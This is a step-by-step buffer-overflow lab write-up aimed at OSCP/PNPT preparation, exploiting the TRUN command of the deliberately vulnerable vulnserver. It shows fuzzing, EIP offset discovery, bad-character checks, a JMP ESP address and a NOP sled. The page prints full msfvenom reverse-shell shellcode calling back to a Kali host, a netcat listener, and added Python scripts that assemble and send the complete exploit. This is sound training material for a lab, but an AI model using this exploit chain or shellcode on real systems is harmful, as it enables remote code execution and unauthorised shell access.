Buffer Overflow
This write-up is about buffer overflows, an indispensable topic for anyone preparing for OSCP/PNPT. Here we cover, step by step, a BOF of a vulnerable server.
Get the vulnerable server (vulnserver)
Run the server on port 9999
Write a Python script that connects to it
We can check for the same response from Kali for verification:
nc 192.168.100.7 9999
Send "HELP" from the script
Output:
Here we can see the various commands we can use to test for an overflow.
For this test we use the TRUN command.
Syntax for TRUN:
payload = 'TRUN /.:/' + junk
Now send junk bytes in increasing amounts to find the approximate size at which the server crashes.
Open the application in Immunity Debugger
(Run fuzzer.py from the script to show fuzzing)
Crashed at about 2000 bytes
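An added example of the fuzzing step, not the fuzzer.py from the original write-up: it sends TRUN with 100 more bytes of junk each round and returns the first size at which the server no longer answers. It is Python 3 (bytes, not the Python 2 strings the write-up uses); the host and port are the lab values from the page, and FakeTarget is a constructed stand-in for vulnserver so the loop can be run without the VM.

```python
import socket

PREFIX = b"TRUN /.:/"


def fuzz_trun(host, port, start=100, step=100, limit=5000, timeout=2.0,
              connect=socket.create_connection):
    """Send TRUN with a growing run of 'A's until the server stops answering.

    Returns the first buffer size at which the connection failed (the
    approximate crash point), or None if the server survived every stage
    up to `limit`. `connect` is injectable so the loop can be exercised
    without a live target (see FakeTarget below).
    """
    size = start
    while size <= limit:
        try:
            with connect((host, port), timeout=timeout) as s:
                s.recv(1024)                    # welcome banner
                s.sendall(PREFIX + b"A" * size)
                s.recv(1024)                    # "TRUN COMPLETE" while it is alive
        except OSError:                         # refused, reset or timed out: crashed
            return size
        print("server survived", size, "bytes")
        size += step
    return None


class FakeTarget:
    """Constructed stand-in for vulnserver, used only to run the fuzzer
    offline: answers like a live service until the junk reaches `crash_at`
    bytes, then raises the error a real crash produces."""

    def __init__(self, crash_at):
        self.crash_at = crash_at

    def __call__(self, address, timeout=None):
        return self

    def __enter__(self):
        return self

    def __exit__(self, *exc):
        return False

    def recv(self, bufsize):
        return b"Welcome to the constructed server\n"

    def sendall(self, data):
        if len(data) - len(PREFIX) >= self.crash_at:
            raise ConnectionResetError("simulated crash")


if __name__ == "__main__":
    # Against the write-up's lab target (IP and port from the page).
    print("crashed at about", fuzz_trun("192.168.100.7", 9999), "bytes")
```

The second recv matters: a crashed process may still accept the connection before the OS tears it down, so only the missing reply (timeout or reset) is reliable evidence of the crash.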
Running process
Send 5000 A's to the process
We can see the process crashed
We can see all A's here in ESP and EIP (0x41 is the hex value of 'A')
Use a pattern generation script to create a unique pattern (other options: Metasploit's pattern_create or mona)
Length: 5000
Our unique pattern is created
Copy this pattern into the script
Now send the pattern to vulnserver from the script
Variable used: pat =
We can see the server crashed
Go to ESP, right-click and choose "Follow in Stack"
In the stack, right-click and copy to clipboard
009CF9C8 417A6F32 2ozA esp
Notice that the EIP value sits just above the ESP value in the stack (the dump is little-endian: 417A6F32 is the bytes "2ozA" as they appear in memory):
009CF9C4 4B594237 7BYK EIP
Make sure the application is running
Now we find the offset of the bytes that landed in EIP and ESP
Comment out s.send(payload)
Rerun the application
Run the script
After running we can see the offsets
which show EIP at 2003 and ESP at 2007
which means the 4 bytes that overwrite EIP start after 2003 bytes of junk, and the data ESP points to starts at 2007, directly after EIP
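An added example (not the write-up's own pattern script) of the offset step in Python 3. It builds a cyclic pattern in the Metasploit pattern_create style and maps a register value as Immunity prints it back to an offset, handling the little-endian reversal the stack dump above shows. The write-up's generator used a different alphabet, so its values 417A6F32 and 4B594237 are not in this pattern; simulate_crash is a constructed stand-in for the debugger that produces the values this pattern would give for a return address 2003 bytes in.

```python
import string
import struct


def pattern_create(length):
    """Cyclic pattern in the Metasploit pattern_create style (Aa0Aa1Aa2...).

    Every 4-byte window is unique within the 20280-byte period, so a
    register value that lands in it maps back to exactly one offset.
    """
    out = bytearray()
    while len(out) < length:
        for upper in string.ascii_uppercase:
            for lower in string.ascii_lowercase:
                for digit in string.digits:
                    out += (upper + lower + digit).encode()
                    if len(out) >= length:
                        return bytes(out[:length])
    return bytes(out)


def pattern_offset(pattern, register_value):
    """Offset in `pattern` of the bytes a crashed register holds or points at.

    `register_value` is the 32-bit value as Immunity prints it, e.g.
    0x417A6F32 or "417A6F32". x86 is little-endian, so the bytes as they
    sit in memory are the printed hex reversed (0x417A6F32 -> b"2ozA").
    Returns -1 when the value is not in the pattern (for example because
    a bad character mangled the buffer before the crash).
    """
    if isinstance(register_value, str):
        register_value = int(register_value, 16)
    return pattern.find(struct.pack("<I", register_value))


def locate_crash(pattern, eip_value, esp_value):
    """Tie the two offsets together the way the write-up reads them:
    `junk` is how many bytes precede the 4 that overwrite EIP, and `gap`
    is how many bytes sit between the saved return address and the data
    ESP points at (0 means the shellcode can start right after EIP)."""
    eip_off = pattern_offset(pattern, eip_value)
    esp_off = pattern_offset(pattern, esp_value)
    return {"eip": eip_off, "esp": esp_off, "junk": eip_off,
            "gap": esp_off - (eip_off + 4)}


def simulate_crash(pattern, return_addr_offset):
    """Constructed stand-in for the debugger: if the saved return address
    sits `return_addr_offset` bytes into the buffer and ESP ends up pointing
    right behind it (as on the page), these are the EIP and ESP values
    Immunity would print."""
    eip = struct.unpack("<I", pattern[return_addr_offset:return_addr_offset + 4])[0]
    esp = struct.unpack("<I", pattern[return_addr_offset + 4:return_addr_offset + 8])[0]
    return "%08X" % eip, "%08X" % esp


if __name__ == "__main__":
    pat = pattern_create(5000)
    eip_seen, esp_seen = simulate_crash(pat, 2003)
    print("EIP", eip_seen, "ESP", esp_seen, locate_crash(pat, eip_seen, esp_seen))
```

A gap of 0 is what makes the rest of the write-up work: ESP points at the byte immediately after the return address, so a JMP ESP lands on whatever is placed right behind the 4 EIP bytes.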
For confirmation we alter the script and send:
junk = 'A'*2003
eip = 'B'*4
esp = 'C'*4
junk2 = 'D'*(5000 - len(junk+eip+esp))
payload = 'TRUN /.:/' + junk + eip + esp + junk2
Make sure the application is running
After running the code the server crashed
ESP holds all C's and EIP all B's, exactly what we sent, so the offset is verified
FIND BAD CHARACTERS
!mona config -set workingfolder C:\mona\%p
!mona bytearray -b "\x00"
The file is created in that folder
Copy the characters from bytearray.txt into the code
Create a new variable allchars
Send allchars in place of the ESP bytes (right after eip)
Run the program again
!mona compare -f C:\mona\vulnserver\bytearray.bin -a 00AAF9C8
00AAF9C8: memory address of ESP at the crash
Memory comparison result:
"Unmodified" means no additional bad characters were identified. The only bad character is \x00, the null byte we excluded from the start.
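An added example, not part of the original write-up, of what the bytearray/compare round does, in Python 3: build the array of all bytes minus the known bad ones, compare it with what came back at ESP, and repeat, excluding the first byte that did not survive, until a round comes back unmodified. constructed_target is a constructed server that silently drops bytes; it is not vulnserver's behaviour (TRUN only chokes on \x00) and is there to show the loop handling more than one bad character.

```python
def make_bytearray(exclude=(0x00,)):
    """Same idea as `!mona bytearray -b "\\x00"`: every byte value except
    the ones already known to be bad, in ascending order."""
    excluded = set(exclude)
    return bytes(b for b in range(256) if b not in excluded)


def compare_bytes(expected, dumped):
    """Same idea as `!mona compare`: walk the array as sent next to what was
    found at ESP and return the first byte that did not survive, or None
    when the dump is unmodified. Checking stops at the first mismatch: a
    dropped or swapped byte shifts or corrupts everything after it, so
    later differences are not evidence on their own."""
    for i, want in enumerate(expected):
        if i >= len(dumped) or dumped[i] != want:
            return want
    return None


def find_bad_chars(send_and_dump, known=(0x00,)):
    """The analyst's loop: send the array, compare, exclude the culprit,
    repeat until a round comes back unmodified. `send_and_dump` delivers
    the array to the target and returns the bytes read back at ESP."""
    bad = list(known)
    while True:
        arr = make_bytearray(bad)
        culprit = compare_bytes(arr, send_and_dump(arr))
        if culprit is None:
            return bytes(bad)
        bad.append(culprit)


def constructed_target(dropped):
    """Constructed stand-in for a server that silently eats some bytes
    (not vulnserver's TRUN, which only chokes on 0x00)."""
    return lambda data: bytes(b for b in data if b not in dropped)


if __name__ == "__main__":
    # vulnserver case: everything comes back intact, only the excluded null is bad
    print(find_bad_chars(lambda data: data))
    # constructed case: a server that drops line endings
    print(find_bad_chars(constructed_target({0x0a, 0x0d})))
```

Excluding one byte per round rather than everything that differs is deliberate: once a byte is dropped the dump is shifted, and every byte after it "differs" even though it is fine.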
Restart the application
!mona jmp -r esp -cpb "\x00"
Why this is done: EIP must be pointed at a JMP ESP instruction so that execution lands on the bytes we control at ESP. mona searches the loaded modules for one, skipping any pointer that contains our bad characters (-cpb).
625011AF
Change the code: eip must hold this address in little-endian byte order (the bytes of 625011AF reversed: af 11 50 62) instead of 'B'*4
625011AF
The address contains no bad characters, so we can use it safely
Add a NOP sled of 16 bytes (2 rows in the debugger) in front of where the shellcode will go:
esp = '\x90'*16
Prepare the shellcode in Kali with Metasploit (-b excludes the bad character found above):
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.100.5 LPORT=4444 -a x86 -b "\x00" -f c
Copy the shellcode (C-format output):
unsigned char buf[] =
"\xba\x3f\x6b\x79\x15\xdb\xc7\xd9\x74\x24\xf4\x58\x29\xc9\xb1"
"\x52\x83\xc0\x04\x31\x50\x0e\x03\x6f\x65\x9b\xe0\x73\x91\xd9"
"\x0b\x8b\x62\xbe\x82\x6e\x53\xfe\xf1\xfb\xc4\xce\x72\xa9\xe8"
"\xa5\xd7\x59\x7a\xcb\xff\x6e\xcb\x66\x26\x41\xcc\xdb\x1a\xc0"
"\x4e\x26\x4f\x22\x6e\xe9\x82\x23\xb7\x14\x6e\x71\x60\x52\xdd"
"\x65\x05\x2e\xde\x0e\x55\xbe\x66\xf3\x2e\xc1\x47\xa2\x25\x98"
"\x47\x45\xe9\x90\xc1\x5d\xee\x9d\x98\xd6\xc4\x6a\x1b\x3e\x15"
"\x92\xb0\x7f\x99\x61\xc8\xb8\x1e\x9a\xbf\xb0\x5c\x27\xb8\x07"
"\x1e\xf3\x4d\x93\xb8\x70\xf5\x7f\x38\x54\x60\xf4\x36\x11\xe6"
"\x52\x5b\xa4\x2b\xe9\x67\x2d\xca\x3d\xee\x75\xe9\x99\xaa\x2e"
"\x90\xb8\x16\x80\xad\xda\xf8\x7d\x08\x91\x15\x69\x21\xf8\x71"
"\x5e\x08\x02\x82\xc8\x1b\x71\xb0\x57\xb0\x1d\xf8\x10\x1e\xda"
"\xff\x0a\xe6\x74\xfe\xb4\x17\x5d\xc5\xe1\x47\xf5\xec\x89\x03"
"\x05\x10\x5c\x83\x55\xbe\x0f\x64\x05\x7e\xe0\x0c\x4f\x71\xdf"
"\x2d\x70\x5b\x48\xc7\x8b\x0c\xb7\xb0\xf7\xc9\x5f\xc3\xf7\xc0"
"\xc3\x4a\x11\x88\xeb\x1a\x8a\x25\x95\x06\x40\xd7\x5a\x9d\x2d"
"\xd7\xd1\x12\xd2\x96\x11\x5e\xc0\x4f\xd2\x15\xba\xc6\xed\x83"
"\xd2\x85\x7c\x48\x22\xc3\x9c\xc7\x75\x84\x53\x1e\x13\x38\xcd"
"\x88\x01\xc1\x8b\xf3\x81\x1e\x68\xfd\x08\xd2\xd4\xd9\x1a\x2a"
"\xd4\x65\x4e\xe2\x83\x33\x38\x44\x7a\xf2\x92\x1e\xd1\x5c\x72"
"\xe6\x19\x5f\x04\xe7\x77\x29\xe8\x56\x2e\x6c\x17\x56\xa6\x78"
"\x60\x8a\x56\x86\xbb\x0e\x66\xcd\xe1\x27\xef\x88\x70\x7a\x72"
"\x2b\xaf\xb9\x8b\xa8\x45\x42\x68\xb0\x2c\x47\x34\x76\xdd\x35"
"\x25\x13\xe1\xea\x46\x36";
Paste the shellcode into the Python code and append it to the NOP sled:
esp += shellcode
The final payload (esp now holds the NOP sled followed by the shellcode):
payload = 'TRUN /.:/' + junk + eip + esp + junk2
Create a listener on port 4444 in Kali:
nc -nvlp 4444
Make sure the application is running
After executing the script we get a reverse shell
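An added example, not the write-up's final script, that assembles the whole chain above in Python 3: junk up to the offset, the JMP ESP address packed little-endian, the NOP sled, the shellcode, and filler to keep the buffer at the tested 5000 bytes, with a bad-character check before anything is sent. The offset, address, host and port are the page's values. SHELLCODE is a constructed stand-in (INT3 breakpoints) so the file runs without the msfvenom bytes; with the target under Immunity, stopping on an INT3 proves the JMP ESP and sled work before the real reverse-shell bytes go in.

```python
import socket
import struct

PREFIX = b"TRUN /.:/"
EIP_OFFSET = 2003            # bytes of junk before EIP, from the pattern step
JMP_ESP = 0x625011AF         # address reported by !mona jmp -r esp
BAD_CHARS = b"\x00"          # the only bad character found for TRUN
TOTAL = 5000                 # keep the buffer the size that was tested

# Constructed stand-in for the msfvenom output: INT3 breakpoints. Replace
# with the `unsigned char buf[]` bytes from msfvenom for the reverse shell.
SHELLCODE = b"\xcc" * 4


def has_bad_chars(data, bad_chars=BAD_CHARS):
    """True if any of the bad characters appears anywhere in `data`."""
    return any(b in data for b in bad_chars)


def build_payload(shellcode, eip_offset=EIP_OFFSET, jmp_esp=JMP_ESP,
                  nops=16, total=TOTAL, bad_chars=BAD_CHARS):
    """junk | JMP ESP address (little-endian) | NOP sled | shellcode | filler.

    struct.pack("<I", 0x625011AF) is b"\\xaf\\x11\\x50\\x62", the same
    byte reversal the write-up does by hand. Filler keeps the total at the
    size that was fuzzed so the stack layout at the crash does not move.
    """
    eip = struct.pack("<I", jmp_esp)
    body = b"A" * eip_offset + eip + b"\x90" * nops + shellcode
    if len(body) > total:
        raise ValueError("payload needs %d bytes, only %d available" % (len(body), total))
    body += b"D" * (total - len(body))
    if has_bad_chars(body, bad_chars):
        raise ValueError("bad character in payload: re-encode or pick another JMP ESP")
    return PREFIX + body


if __name__ == "__main__":
    payload = build_payload(SHELLCODE)
    # nc -nvlp 4444 must already be listening when the real shellcode is used.
    with socket.create_connection(("192.168.100.7", 9999)) as s:
        s.recv(1024)
        s.sendall(payload)
```

Checking the finished buffer for bad characters catches the two places they sneak in: a JMP ESP address that happens to contain one, and shellcode generated without the matching -b option.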
Hope this is helpful. Happy Hacking :)
DM me if stuck anywhere or needs help :)